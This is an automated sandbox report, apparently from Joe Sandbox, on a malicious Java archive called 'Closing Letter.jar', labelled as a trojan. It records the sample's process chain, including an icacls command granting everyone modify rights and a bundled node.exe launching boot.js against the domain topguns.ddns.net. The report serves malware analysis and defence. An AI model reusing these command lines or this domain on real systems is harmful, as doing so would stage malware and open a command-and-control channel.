Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local\Temp | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js | Jump to behavior |
Source: Joe Sandbox View | IP Address: 193.228.91.12 193.228.91.12 |
Source: Joe Sandbox View | IP Address: 104.20.23.46 104.20.23.46 |
Source: java.exe, 00000002.00000002.709063871.000000000A9C0000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.918652198.000000000A1BD000.00000004.00000001.sdmp | String found in binary or memory: http://bugreport.sun.com/bugreport/ |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.securetrust.com/STCA.crl0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# |
Source: java.exe, 00000002.00000002.709099121.000000000A9D0000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.918691155.000000000A1C9000.00000004.00000001.sdmp | String found in binary or memory: http://java.oracle.com/ |
Source: javaw.exe, 00000007.00000002.936544095.000000001696B000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.926957064.00000000150E6000.00000004.00000001.sdmp | String found in binary or memory: http://null.oracle.com/ |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.sectigo.com0# |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://policy.camerfirma.com0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://repository.swisssign.com/0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0 |
Source: javaw.exe, 00000007.00000003.674948698.00000000025E1000.00000004.00000001.sdmp | String found in binary or memory: http://www.allatori.com |
Source: java.exe, 00000002.00000002.720781521.00000000164D0000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.931142684.0000000015C88000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class2.crl0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://www.chambersign.org1 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://www.quovadisglobal.com/cps0 |
Source: node.exe, 00000013.00000002.951812248.00007FF64CE07000.00000002.00020000.sdmp | String found in binary or memory: http://www.unicode.org/copyright.html |
Source: node.exe, 00000010.00000003.822183414.000001AB67737000.00000004.00000001.sdmp | String found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=6593 |
Source: node.exe, 00000010.00000003.822183414.000001AB67737000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/v8/v8/blob/d6ead37d265d7215cf9c5f768f279e21bd170212/src/js/prologue.js#L152-L156 |
Source: java.exe, 00000002.00000002.709137697.000000000AA07000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.918691155.000000000A1C9000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: https://nodejs.org/dist/v14.12.0/ |
Source: javaw.exe, 00000007.00000002.936026786.0000000016840000.00000004.00000001.sdmp | String found in binary or memory: https://nodejs.org/dist/v14.12.0/3FCA97F |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0 |
Source: node.exe, 00000010.00000003.822183414.000001AB67737000.00000004.00000001.sdmp | String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761 |
Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process Stats: CPU usage > 98% |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_032DEC17 | 2_2_032DEC17 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC06584 | 7_3_0AC06584 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC06584 | 7_3_0AC06584 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC06584 | 7_3_0AC06584 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC06584 | 7_3_0AC06584 |
Source: classification engine | Classification label: mal60.troj.expl.evad.winJAR@15/1028@4/3 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1320:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_01 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar'' >> C:\cmdlinestart.log 2>&1 | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar' | |
Source: unknown | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar C:\Users\user\AppData\Local\Temp\28fda05a.tmp | |
Source: unknown | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net | |
Source: unknown | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar' | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar C:\Users\user\AppData\Local\Temp\28fda05a.tmp | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net | Jump to behavior |
Source: Yara match | File source: Closing Letter.jar, type: SAMPLE |
Source: Yara match | File source: 00000007.00000003.674948698.00000000025E1000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000007.00000002.912897413.0000000002958000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.707554230.00000000031B8000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.707993632.000000000548C000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.653167812.0000000002DD1000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: java.exe PID: 4240, type: MEMORY |
Source: Yara match | File source: Process Memory Space: javaw.exe PID: 6900, type: MEMORY |
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\28fda05a.tmp, type: DROPPED |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323D877 push 00000000h; mov dword ptr [esp], esp | 2_2_0323D8A1 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323BB27 push 00000000h; mov dword ptr [esp], esp | 2_2_0323BB4D |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323B377 push 00000000h; mov dword ptr [esp], esp | 2_2_0323B39D |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323B907 push 00000000h; mov dword ptr [esp], esp | 2_2_0323B92D |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323A1CA push ecx; ret | 2_2_0323A1DA |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323A1DB push ecx; ret | 2_2_0323A1E5 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323D860 push 00000000h; mov dword ptr [esp], esp | 2_2_0323D8A1 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_03242D44 push eax; retf | 2_2_03242D45 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323C437 push 00000000h; mov dword ptr [esp], esp | 2_2_0323C45D |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_032D9751 push cs; retf | 2_2_032D9771 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC03B42 push eax; iretd | 7_3_0AC03B69 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC03B42 push eax; iretd | 7_3_0AC03B69 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC02957 push eax; iretd | 7_3_0AC02A29 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC02957 push eax; iretd | 7_3_0AC02A29 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC00427 push eax; iretd | 7_3_0AC00441 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC00427 push eax; iretd | 7_3_0AC00441 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC02A30 push eax; iretd | 7_3_0AC02A29 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC02A30 push eax; iretd | 7_3_0AC02A29 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC03B42 push eax; iretd | 7_3_0AC03B69 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC03B42 push eax; iretd | 7_3_0AC03B69 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC02957 push eax; iretd | 7_3_0AC02A29 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC02957 push eax; iretd | 7_3_0AC02A29 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC00427 push eax; iretd | 7_3_0AC00441 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC00427 push eax; iretd | 7_3_0AC00441 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC02A30 push eax; iretd | 7_3_0AC02A29 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC02A30 push eax; iretd | 7_3_0AC02A29 |
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local\Temp | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js | Jump to behavior |
Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed. |
Source: java.exe, 00000002.00000002.707500483.0000000003130000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.912762157.00000000028D0000.00000004.00000001.sdmp | Binary or memory string: ,java/lang/VirtualMachineError |
Source: java.exe, 00000002.00000002.707500483.0000000003130000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.912762157.00000000028D0000.00000004.00000001.sdmp | Binary or memory string: |[Ljava/lang/VirtualMachineError; |
Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service. |
Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported. |
Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service. |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar' | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar C:\Users\user\AppData\Local\Temp\28fda05a.tmp | Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net | Jump to behavior |
Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmp | Binary or memory string: Program Manager |
Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd |
Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmp | Binary or memory string: Progman |
Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js VolumeInformation | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users VolumeInformation | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user VolumeInformation | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user\AppData VolumeInformation | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user\AppData\Local VolumeInformation | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE VolumeInformation | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js VolumeInformation | Jump to behavior |
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js VolumeInformation | Jump to behavior |